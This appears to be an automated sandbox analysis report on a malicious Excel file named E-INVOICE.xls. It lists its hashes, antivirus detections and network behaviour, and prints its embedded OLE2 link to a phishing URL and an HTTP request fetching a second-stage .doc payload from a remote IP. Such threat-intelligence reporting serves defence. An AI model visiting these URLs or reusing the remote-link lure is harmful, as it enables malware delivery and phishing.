Windows Analysis Report
E-INVOICE.xls

Overview

General Information

Sample name:	E-INVOICE.xls
Analysis ID:	1467962
MD5:	6586786ff2d63581546545fe37f711db
SHA1:	227eef347b15fe072cbf41c49a42d4d9f6bb4888
SHA256:	3722989fb37d2b30e4e04404660ee6757fe8dc872540ddf57e5c04b8f6307315
Tags:	xls
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

AI detected suspicious Excel or Word document

Excel sheet contains many unusual embedded objects

Document embeds suspicious OLE2 link

IP address seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Sigma detected: Excel Network Connections

Sigma detected: Suspicious Office Outbound Connections

Uses a known web browser user agent for HTTP communication

Classification

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://hop.fyi/r1FbC	Avira URL Cloud: Label: phishing
Source: http://hop.fyi/r1FbC;lI(&	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for domain / URL

Source: hop.fyi	Virustotal: Detection: 12%	Perma Link
Source: http://198.46.178.137/xampp/rg/rg.rg.rg.rgrgrgrgrg.doc	Virustotal: Detection: 8%	Perma Link
Source: http://hop.fyi/r1FbC	Virustotal: Detection: 9%	Perma Link

Multi AV Scanner detection for submitted file

Source: E-INVOICE.xls	ReversingLabs: Detection: 37%
Source: E-INVOICE.xls	Virustotal: Detection: 23%			Perma Link

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: hop.fyi

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.178.137:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.137:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.178.137:80
Source: global traffic	TCP traffic: 198.46.178.137:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.178.137:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.178.137:80
Source: global traffic	TCP traffic: 198.46.178.137:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 198.46.178.137:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.178.137:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 198.46.178.137:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.178.137:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.178.137:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.137:80
Source: global traffic	TCP traffic: 198.46.178.137:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 198.46.178.137:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.137:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.137:80
Source: global traffic	TCP traffic: 198.46.178.137:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.137:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.137:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 198.46.178.137:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.137:80

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 198.46.178.137 198.46.178.137
Source: Joe Sandbox View	IP Address: 192.185.89.92 192.185.89.92

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /r1FbC HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hop.fyiConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/rg/rg.rg.rg.rgrgrgrgrg.doc HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.137Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /r1FbC HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hop.fyiConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/rg/rg.rg.rg.rgrgrgrgrg.doc HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.137Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.137
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.137
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.137
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.137
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.137
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.137
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.137
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.137
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.137
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.137
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.137

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\955171D8.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /r1FbC HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hop.fyiConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/rg/rg.rg.rg.rgrgrgrgrg.doc HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.137Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /r1FbC HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hop.fyiConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/rg/rg.rg.rg.rgrgrgrgrg.doc HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.137Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: hop.fyi

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 05:13:18 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Content-Length: 300Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 34 36 2e 31 37 38 2e 31 33 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 198.46.178.137 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 05:13:35 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Content-Length: 300Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 34 36 2e 31 37 38 2e 31 33 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 198.46.178.137 Port 80</address></body></html>

Source: E-INVOICE.xls, B9030000.0.dr

String found in binary or memory: http://hop.fyi/r1FbC;lI(&

System Summary

Excel sheet contains many unusual embedded objects

Source: E-INVOICE.xls	OLE: Microsoft Excel 2007+
Source: B9030000.0.dr	OLE: Microsoft Excel 2007+

Document embeds suspicious OLE2 link

Source: E-INVOICE.xls	Stream path 'MBD00022108/\x1Ole' : http://hop.fyi/r1FbC;lI(&+pR_&Rw8%fG@I[ObaK(_1\+t=\+&?.16.#<<{iNDDZ+'1ks\-B)UT4aA{0Hq/\bX/IaSiuN"%iAy0B%:cDjSXozvvr7xZ04X4iH43Zaa1IjK6AqdOHyddWrYYiZwMLhEZ1BXYmJ6vq7IDEHjWNIl9p4shJljkQ2RHql00aiYKaxXVXDpnfTvjXivzDHnY7DhLWeHVhA~a/Zdh o+7~30&k
Source: B9030000.0.dr	Stream path 'MBD00022108/\x1Ole' : http://hop.fyi/r1FbC;lI(&+pR_&Rw8%fG@I[ObaK(_1\+t=\+&?.16.#<<{iNDDZ+'1ks\-B)UT4aA{0Hq/\bX/IaSiuN"%iAy0B%:cDjSXozvvr7xZ04X4iH43Zaa1IjK6AqdOHyddWrYYiZwMLhEZ1BXYmJ6vq7IDEHjWNIl9p4shJljkQ2RHql00aiYKaxXVXDpnfTvjXivzDHnY7DhLWeHVhA~a/Zdh o+7~30&k

Source: classification engine

Classification label: mal72.winXLS@1/8@1/2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\B9030000

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR78F6.tmp

Jump to behavior

Source: E-INVOICE.xls	OLE indicator, Workbook stream: true
Source: B9030000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: E-INVOICE.xls	ReversingLabs: Detection: 37%
Source: E-INVOICE.xls	Virustotal: Detection: 23%

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: E-INVOICE.xls

Initial sample: OLE indicators vbamacros = False

Source: E-INVOICE.xls

Initial sample: OLE indicators encrypted = True

Persistence and Installation Behavior

AI detected suspicious Excel or Word document

Source: Office document

LLM: Score: 9 Reasons: The screenshot contains a visually prominent message stating 'This document is protected' alongside a recognizable Microsoft Office logo, which can create a false sense of legitimacy. The text 'This document is protected' implies that the user needs to take action to view the document, creating a sense of urgency. The use of the Microsoft Office logo is an attempt to impersonate a well-known brand, which can mislead users into trusting the document. The combination of these elements strongly suggests that the document could be used to trick users into clicking on a potentially harmful link, leading to a phishing page or malware download.

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: E-INVOICE.xls	Stream path 'Workbook' entropy: 7.99648221014 (max. 8.0)
Source: B9030000.0.dr	Stream path 'Workbook' entropy: 7.99639050495 (max. 8.0)

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.46.178.137	unknown	United States		36352	AS-COLOCROSSINGUS	false
192.185.89.92	hop.fyi	United States		46606	UNIFIEDLAYER-AS-1US	false

Contacted Domains

Name	IP	Active
hop.fyi	192.185.89.92	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://hop.fyi/r1FbC	true	10%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://198.46.178.137/xampp/rg/rg.rg.rg.rgrgrgrgrg.doc	false	9%, Virustotal, Browse Avira URL Cloud: safe	unknown

ID:	1467962
Product:	CloudBasic
Start time:	07:12:07
Start date:	05.07.2024
Sample:	E-INVOICE.xls
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	6586786ff2d63581546545fe37f711db
SHA1:	227eef347b15fe072cbf41c49a42d4d9f6bb4888
SHA256:	3722989fb37d2b30e4e04404660ee6757fe8dc872540ddf57e5c04b8f6307315
Filetype:	Microsoft Excel sheet (30009/1) 78.94%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\27072DA6.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	3221719DA1CA6DAE0ED75449AD3BBDBC	C1C0DAAE75FF32B92A1D060BC1FCE01D48B8BE0F	5C335B6C60214A0B5A1C399F8DF14FC148ADBC0EA9D0E78098AAB59985778775
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\955171D8.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	3221719DA1CA6DAE0ED75449AD3BBDBC	C1C0DAAE75FF32B92A1D060BC1FCE01D48B8BE0F	5C335B6C60214A0B5A1C399F8DF14FC148ADBC0EA9D0E78098AAB59985778775
C:\Users\user\AppData\Local\Temp\~DF2167C76C05CC66DB.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DF2A03CFBC1FC45B4C.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DFD31862728B6A1BF9.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\Desktop\B9030000	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 5 06:13:33 2024, Security: 1	D386DF37CEFED8CA697E9AD4592407E5	0EE9000E3FB7663AD600A944A294F45AF9FB0F79	3EC343EB557E6CB18C079D8439B063A215C147C0172284F2D4E8AE001F9211D9
C:\Users\user\Desktop\B9030000:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\Desktop\E-INVOICE.xls (copy)	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 5 06:13:33 2024, Security: 1	D386DF37CEFED8CA697E9AD4592407E5	0EE9000E3FB7663AD600A944A294F45AF9FB0F79	3EC343EB557E6CB18C079D8439B063A215C147C0172284F2D4E8AE001F9211D9

Windows Analysis Report
E-INVOICE.xls

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report E-INVOICE.xls

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
E-INVOICE.xls